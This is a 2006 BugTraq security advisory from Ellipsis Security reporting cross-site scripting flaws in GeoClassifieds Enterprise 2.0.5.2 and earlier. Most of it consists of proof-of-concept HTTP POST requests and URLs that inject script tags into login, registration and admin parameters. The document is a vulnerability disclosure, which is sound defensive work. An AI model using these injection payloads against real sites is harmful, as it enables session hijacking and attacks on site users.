BugTraq
GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting Jul 27 2006 05:59AM
securityconnection gmail com
GeoClassifieds Enterprise 2.0.5.2

http://geodesicsolutions.com/products/classifieds/classifieds_enterprise
.htm

--------------------------

Cross Site Scripting (XSS)

--------------------------

POST http://target.xx:80/index.php?a=10 HTTP/1.0

Host: target.xx

Content-Type: application/x-www-form-urlencoded

Content-Length: 115

b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]
2=1&submit=1

---

POST http://target.xx:80/register.php?b=1 HTTP/1.0

Host: target.xx

Content-Type: application/x-www-form-urlencoded

Content-Length: 208

c[firstname]=1&c[lastname]=1&c[company_name]=1&c[business_type]=1&c[busi
ness_type]=1&c[address]=1&c[address_2]=1&c[city]=1&c[zip]=1&c[phone]="><
script>alert(/EllipsisSecurityTest/)</script>

---

http://target.xx/index.php?a=11&b=0&c=><script>alert(/EllipsisSecurityTe
st/)</script>&d=5

http://target.xx/admin/index.php?b[username]="><script>alert(/EllipsisSe
curityTest/)</script>&b[password]=1

-----------------

Ellipsis Security

http://www.ellsec.org

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus